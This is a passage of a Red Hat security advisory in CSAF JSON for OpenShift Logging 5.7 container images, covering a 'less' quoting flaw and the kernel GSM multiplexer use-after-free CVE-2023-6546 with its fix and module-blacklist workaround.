"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "less: missing quoting of shell metacharacters in LESSCLOSE handling"
},
{
"cve": "CVE-2023-6546",
"cwe": {
"id": "CWE-416",
"name": "Use After Free"
},
"discovery_date": "2023-12-18T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2255498"
}
],
"notes": [
{
"category": "description",
"text": "A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: GSM multiplexing race condition leads to privilege escalation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability is critical because it can be exploited to escalate privileges, directly threatening system security. Despite requiring local access and having a high attack complexity, the potential to severely impact confidentiality, integrity, and availability justifies its \"Important\" rating.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6546"
},
{
"category": "external",
"summary": "RHBZ#2255498",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255498"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6546"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6546",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6546"
},
{
"category": "external",
"summary": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3",
"url": "https://github.com/torvalds/linux/commit/3c4f8333b582487a2d1e02171f1465531cde53e3"
},
{
"category": "external",
"summary": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527",
"url": "https://www.zerodayinitiative.com/advisories/ZDI-CAN-20527"
}
],
"release_date": "2023-12-21T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
},
{
"category": "workaround",
"details": "This flaw can be mitigated by preventing the affected `n_gsm` kernel module from being loaded. For instructions on how to blacklist a kernel module, please see https://access.redhat.com/solutions/41278.",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
